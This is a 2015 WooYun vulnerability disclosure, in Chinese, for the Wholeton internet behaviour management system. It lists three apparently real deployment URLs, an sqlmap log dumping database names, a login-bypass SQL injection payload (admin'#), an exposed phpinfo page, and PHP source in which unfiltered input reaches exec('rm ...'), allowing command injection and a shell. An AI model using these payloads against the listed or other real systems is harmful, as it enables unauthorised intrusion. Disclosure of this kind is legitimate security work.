漏洞概要
缺陷编号:
WooYun-2015-91953
漏洞标题: 惠尔顿上网行为管理系统任意命令执行getshell
相关厂商:
深圳市惠尔顿信息技术有限公司
漏洞作者:
路人甲
提交时间: 2015-01-17 17:26
公开时间: 2015-04-15 17:28
漏洞类型: 命令执行
危害等级: 高
自评Rank: 20
漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org
Tags标签: 无
漏洞详情披露状态:
2015-01-17: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经确认,细节仅向厂商公开
2015-01-23: 细节向第三方安全合作伙伴开放
2015-03-16: 细节向核心白帽子及相关领域专家公开
2015-03-26: 细节向普通白帽子公开
2015-04-05: 细节向实习白帽子公开
2015-04-15: 细节向公众公开
简要描述:
惠尔顿上网行为管理系统漏洞之getshell
详细说明:
惠尔顿上网行为管理系统
code 区域https://222.92.15.100/base/login/login.php
http://test.bescar.com/base/login/login.php
http://222.223.56.116/base/login/login.php
#1,登陆框存在SQL注入漏洞
[22:03:22] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.4
back-end DBMS: MySQL 5.0.11
[22:03:23] [INFO] fetching database names
[22:03:23] [INFO] heuristics detected web page charset 'ascii'
[22:03:23] [INFO] the SQL query used returns 6 entries
[22:03:23] [INFO] retrieved: information_schema
[22:03:24] [INFO] retrieved: aclocal
[22:03:24] [INFO] retrieved: ifdb
[22:03:25] [INFO] retrieved: mysql
[22:03:25] [INFO] retrieved: wholeton_fms
[22:03:25] [INFO] retrieved: wholeton_otp
available databases [6]:
aclocal
ifdb
information_schema
mysql
wholeton_fms
wholeton_otp
利用admin'#,密码任意登陆即可
#2,存在phpinfo.php测试页面,泄露服务器敏感信息
code 区域/base/phoinfo.php
#3,登陆系统后,点击系统管理-系统工具-抓包工具,随便抓下,生成一个数据包,删除该数据包文件时,未进行参数过滤,导致任意命令执行
删除数据包页面链接 /base/sys/testtool.php
根据 WooYun: 惠尔顿上网行为管理路由存在权限绕过漏洞(泄漏密码等信息) 下载页面源代码文件
code 区域function EtherealTool(){
global $user_role_i;
global $user_role_d;
global $thisfile;
$identifier = htmlobject_request('identifier');
if($identifier == '') {
$identifier = array();
}
switch (htmlobject_request('action')) {
case '删除':
if(is_array($identifier)){
foreach($identifier as $id) {
exec("rm ".$id);
$name = "删除导出的文件:".$id;
writeSysLog($name);
}
}
break;
}
......
可以看出$identifier直接从客户端获取,未进行任何过滤,从而导致任意命令执行。
漏洞证明:
以222.92.15.100为例,其他同样可复现。漏洞证明:
修复方案:
#1,修复SQL注入漏洞
#2,删除phpinfo页面
#3,过滤客户端参数
#4,删除shell
ps:预览时怎么测试代码跟漏洞证明一样了。。
版权声明:转载请注明来源
路人甲@
乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2015-01-20 14:46
厂商回复:CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。
最新状态:暂无
原文:http://www.wooyun.org/bugs/wooyun-2015-091953